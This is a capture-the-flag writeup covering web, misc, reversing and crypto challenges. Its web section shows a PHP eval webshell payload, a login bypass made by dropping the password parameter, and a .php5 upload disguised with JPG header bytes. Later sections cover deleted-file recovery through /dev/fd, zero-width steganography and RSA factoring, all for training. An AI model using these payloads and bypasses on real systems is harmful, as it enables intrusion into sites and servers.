2019 Security Operations Competition Writeup - Ginkgo


WEB

0x01 easfbypass


Write a webshell by passing in the following (%27 is the URL-encoded single quote):

eval($_POST[%27cd%27]);

Connect with AntSword (蚁剑); phpinfo shows that many functions have been disabled.


So we can upload a bypass to run readflag.


0x04 ezupload

First, F12 reveals a .swp backup file. Recover it on Linux with vim -r to get the source:

<?php
// Login handler recovered from the .swp file (opening tag and closing brace added so it parses).
$sql = "select password from user where name=?";
if ($stmt = $mysqli->prepare($sql)) {
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $stmt->bind_result($dpasswd);
    $stmt->fetch();
    // Bypass: if the request carries no password field, $password is null;
    // when no password was bound either, $dpasswd is also null, so
    // null === null holds and the session is marked as logged in.
    if ($dpasswd === $password) {
        $_SESSION['login'] = 1;
        header("Location: /upload.php");
    } else {
        die("login failed");
    }
    $stmt->close();
}

Visiting upload prompts "plz login". Capture the login request and send it to Repeater, then remove the trailing password parameter.


A 302 redirect comes back; visiting upload again now lands on the upload page.


Now upload a one-line shell with a .php5 extension, prepending JPG image header bytes to the content.


The upload succeeds.


Then connect with AntSword.


MISC

0x01 misc1

Download the file and open it: it is garbled. Try changing the encoding: rename the extension, open it in Word and choose the encoding; a flag-like string then appears in the file.


The curly braces are not displayed correctly; fix them to get the flag.

0x02 misc2

Visit the page.


The site source is given, and it shows an arbitrary file read under the /r route.


However, the flag in the root directory has already been deleted, so it cannot be read the usual way. In an earlier challenge we had used file descriptors: a file that is still open when it is deleted continues to exist through its file descriptor, so the flag can be obtained by reading the descriptor. The descriptor directory is /dev/fd; walking and reading the entries under fd yields the flag.
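The deleted-but-still-open behaviour used here, as an added demonstration that is not part of the writeup: the script creates and unlinks its own temporary file (constructed content), shows that it is still listed under /proc/self/fd (which is what /dev/fd points to on Linux), and reads it back through that entry. It assumes a Linux /proc.

```python
import os
import tempfile

def find_deleted_open_files(pid="self"):
    """Return (fd, target) pairs under /proc/<pid>/fd whose file was unlinked.
    On Linux /dev/fd is a symlink to /proc/self/fd, so for the reading
    process this is exactly the directory the writeup walks."""
    fd_dir = f"/proc/{pid}/fd"
    found = []
    for name in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:                 # fd closed between listdir and readlink
            continue
        if target.endswith(" (deleted)"):
            found.append((int(name), target))
    return found

def demo_recover_deleted_file(content=b"flag{constructed_demo}\n"):
    """Constructed demo: write a temp file, keep it open, unlink the path,
    then read the content back through /proc/self/fd/<n>."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, content)
        os.unlink(path)                            # directory entry is gone ...
        path_gone = not os.path.exists(path)
        deleted = dict(find_deleted_open_files())  # ... but the fd still holds the inode
        # opening the /proc link reopens the same inode from offset 0
        with open(f"/proc/self/fd/{fd}", "rb") as f:
            recovered = f.read()
    finally:
        os.close(fd)
    return {"path_gone": path_gone, "fd_listed": fd in deleted, "recovered": recovered}
```

The same walk over /proc/<pid>/fd is how a responder finds secrets a process still holds after someone "deleted" them from disk.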


0x03 misc3

Download the attachment; it is an HTML page.
Then press F12 to view the source.


It contains a pile of strange-looking entities.

Extract them, replacing &zwnj; with 0 and the other zero-width entity with 1, which gives a binary string:

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101

Converting this binary string to characters gives the flag: flag{e2a9c8b1175e66cf21f8593bc85bf939}
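A decoder for this zero-width scheme, added here and not taken from the writeup: &zwnj; (or the code point U+200C) reads as 0 and &zwj; (U+200D) as 1, every visible character is ignored, and the entity is accepted with or without its trailing semicolon because the page shows the bare form. The sample HTML it runs on is constructed, and the encoder exists only to build that sample.

```python
import re

ZWNJ, ZWJ = "\u200c", "\u200d"            # zero-width non-joiner (&zwnj;) and joiner (&zwj;)
_ENTITY = re.compile(r"&(zwnj|zwj);?")   # semicolon optional: the page wrote "&zwnj"

def extract_hidden_bits(page_text):
    """Map each zero-width character to a bit: &zwnj;/U+200C -> '0', &zwj;/U+200D -> '1'.
    Everything else is dropped, so the whole HTML source can be passed in."""
    text = _ENTITY.sub(lambda m: ZWNJ if m.group(1) == "zwnj" else ZWJ, page_text)
    return "".join("0" if ch == ZWNJ else "1" for ch in text if ch in (ZWNJ, ZWJ))

def bits_to_text(bits):
    """Group the bit string into bytes and decode as ASCII."""
    if not bits or len(bits) % 8:
        raise ValueError("bit string length must be a positive multiple of 8")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")

def decode_hidden(page_text):
    return bits_to_text(extract_hidden_bits(page_text))

def hide_in_html(message, cover="<p>nothing to see here</p>"):
    """Encoder used only to build the constructed sample: message bits become entities."""
    bits = "".join(f"{ord(ch):08b}" for ch in message)
    return cover + "".join("&zwj;" if b == "1" else "&zwnj;" for b in bits)

SAMPLE_HTML = hide_in_html("flag{constructed_zero_width}")   # constructed test page
```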

0x04 webshell

Analyze the packet capture: following the HTTP stream reveals an encrypted webshell file.


Decrypt the webshell file.


After tidying up the shell's formatting, it is clear that the transmitted data is AES-encrypted. Now look at the returned data.


Following the PHP code's logic, strip the strings prepended and appended to the response, then decrypt it with the key obtained from the shell.


The last encrypted segment is base64-encoded; decoding it directly gives the flag.


0x05 twocats

Two images are given, which suggests a blind watermark. Extract the hidden image with a blind-watermark script.


Open it in Stegsolve; the text is just about readable:


flag{BlindWaterMark1234}

RE

0x01 RE1


The real algorithm is the one in the init section. Its logic: the key is used to compute a 256-byte box, and the output is then computed from the box and the input.


Note that each byte of the initial key is first XORed with 7.


Since generating the box does not depend on the input, simply dump (under the debugger) the value XORed with the input at each step and write the following script:

# Bytes XORed with the input at each step (dumped from the running binary)
xorbox = [0xc,0x1,0x33,0x2f,0x7a,0x7c,0xe0,0x0,0x3,0x7a,0x73,0x4e,0x88,0x6d,0xd2,0xcc]
# Expected output that the program compares against
output = [0xFF,0xE1,0x5F,0xD7,0x25,0x10,0x13,0x71,0x74,0xBF,0x19,0x16,0x5F,0x5E,0x30,0x7F]
inputbox = []
# The program swaps byte i with byte 15-i, i.e. reverses the 16 bytes; undo that first
for i in range(8):
    output[i], output[16 - i - 1] = output[16 - i - 1], output[i]
# XOR is its own inverse, so XOR each reversed output byte with the dumped box byte
for i in range(0x10):
    inputtmp = xorbox[i] ^ output[i]
    inputbox.append(inputtmp)
    print(chr(inputtmp), end="")
print()

The script prints s1mple_trick_233, so the flag is flag{s1mple_trick_233}

0x02 RE2

Opening the program and analyzing it shows a system of polynomial equations in 32 unknowns.


Write a MATLAB program to solve the system of equations.


This gives the flag.


Crypto

0x01 RSA1

Analysis: first we get the 400-digit p, and q is p with its high and low halves swapped. Take the high 199 digits and the low 199 digits of n; the single digit in between is uncertain, and trial shows it is 2. This gives, from n, the product of the high and low halves (x in the code below); taking square roots with iroot then yields p and q, from which d is computed and m recovered. The full code is as follows:

from Crypto.Util.number import long_to_bytes
import gmpy2

def getpq(x):
    # x = a*b, where p = a||b and q = b||a with 200-digit halves, so
    # n = x*10^400 + (a^2 + b^2)*10^200 + x  =>  y = a^2 + b^2
    y = ((n - x*pow(10, 400)) - x) // pow(10, 200)
    # a^2 and b^2 are the roots of t^2 - y*t + x^2 = 0; take the larger root
    p = gmpy2.iroot((y + gmpy2.iroot(y*y - 4*x*x, 2)[0]) // 2, 2)[0]
    q = x // p
    # glue the two halves back together; the other prime is n divided by it
    p = int(str(p) + str(q))
    q = n // p
    return p, q

e = 65537

n=21173064304574950843737446409192091844410858354407853391518219828585809575546480463980354529412530785625473800210661276075473243912578032636845746866907991400822100939309254988798139819074875464612813385347487571449985243023886473371811269444618192595245380064162413031254981146354667983890607067651694310528489568882179752700069248266341927980053359911075295668342299406306747805925686573419756406095039162847475158920069325898899318222396609393685237607183668014820188522330005608037386873926432131081161531088656666402464062741934007562757339219055643198715643442608910351994872740343566582808831066736088527333762011263273533065540484105964087424030617602336598479611569611018708530024591023015267812545697478378348866840434551477126856261767535209092047810194387033643274333303926423370062572301

c=16396023285324039009558195962852040868243807971027796599580351414803675753933120024077886501736987010658812435904022750269541456641256887079780585729054681025921699044139927086676479128232499416835051090240458236280851063589059069181638802191717911599940897797235038838827322737207584188123709413077535201099325099110746196702421778588988049442604655243604852727791349351291721230577933794627015369213339150586418524473465234375420448340981330049205933291705601563283196409846408465061438001010141891397738066420524119638524908958331406698679544896351376594583883601612086738834989175070317781690217164773657939589691476539613343289431727103692899002758373929815089904574190511978680084831183328681104467553713888762965976896013404518316128288520016934828176674482545660323358594211794461624622116836

x=2117306430457495084373744640919209184441085835440785339151821982858580957554648046398035452941253078562547380021066127607547324391257803263684574686690799140082210093930925498879813981907487546461281266736088527333762011263273533065540484105964087424030617602336598479611569611018708530024591023015267812545697478378348866840434551477126856261767535209092047810194387033643274333303926423370062572301

if __name__ == "__main__":
    p, q = getpq(x)
    assert p*q == n, "recovered factors do not multiply to n"
    d = gmpy2.invert(e, (p-1)*(q-1))
    m = int(pow(c, d, n))
    print(hex(m))
    print(long_to_bytes(m))
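The same recovery on a small constructed key pair, as an added example rather than the writeup's script: pure Python 3 with math.isqrt instead of gmpy2, where h is the number of digits per half (200 in the challenge), a and b are p's halves and x = ab. It also automates the middle-digit guess described above by trying all ten values (and a possible carry into the top digits) and keeping the candidate that reproduces n; the demo primes and the message are constructed.

```python
from math import gcd, isqrt

def is_prime(k):  # trial division; enough for the small constructed demo primes
    return k > 1 and all(k % d for d in range(2, isqrt(k) + 1))

def recover_pq(n, x, h):
    """p = a*10^h + b, q = b*10^h + a  =>  n = ab*10^(2h) + (a^2+b^2)*10^h + ab.
    Given x = ab, y = a^2+b^2 follows, and a^2, b^2 are the roots of t^2 - y*t + x^2."""
    y = (n - x * 10 ** (2 * h) - x) // 10 ** h
    disc = y * y - 4 * x * x
    r = isqrt(disc) if disc >= 0 else -1
    a2 = (y + r) // 2
    if r < 0 or r * r != disc or a2 < 0:
        raise ValueError("x is not a*b")
    a = isqrt(a2)
    b = x // a if a else 0
    p, q = a * 10 ** h + b, b * 10 ** h + a
    if a * b != x or p * q != n:
        raise ValueError("x is not a*b")
    return p, q

def recover_from_n(n, h):
    """The writeup's trick: the top digits of ab sit at the top of n (up to a carry),
    its low h digits are exactly the low h digits of n, and one digit between
    them is unknown, so try every value and keep the one that reproduces n."""
    low = n % 10 ** h
    top = (n // 10 ** (2 * h)) // 10 ** (h + 1)
    for t in (top, top - 1):             # a carry from the middle term may bump top
        for mid in range(10):
            try:
                return recover_pq(n, t * 10 ** (h + 1) + mid * 10 ** h + low, h)
            except ValueError:
                continue
    raise ValueError("no candidate for a*b reproduces n")

def make_demo_keypair(h=3, e=65537):
    """Constructed demo key: first prime pair whose h-digit halves are swaps of each other."""
    for a in range(10 ** (h - 1), 10 ** h):
        for b in range(10 ** (h - 1), 10 ** h):
            p, q = a * 10 ** h + b, b * 10 ** h + a
            if a != b and is_prime(p) and is_prime(q) and gcd(e, (p - 1) * (q - 1)) == 1:
                return p * q, p, q
    raise RuntimeError("no swapped-half prime pair found")

def rsa_roundtrip(h=3, e=65537, m=4242):
    n, p, q = make_demo_keypair(h, e)        # attacker sees only n, e and the ciphertext
    rp, rq = recover_from_n(n, h)
    d = pow(e, -1, (rp - 1) * (rq - 1))
    return {rp, rq} == {p, q} and pow(pow(m, e, n), d, n) == m
```

The lesson for key generation is the same one the challenge is built on: primes with visible structure (here, one being a digit-permutation of the other) turn n into a solvable equation rather than a factoring problem.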

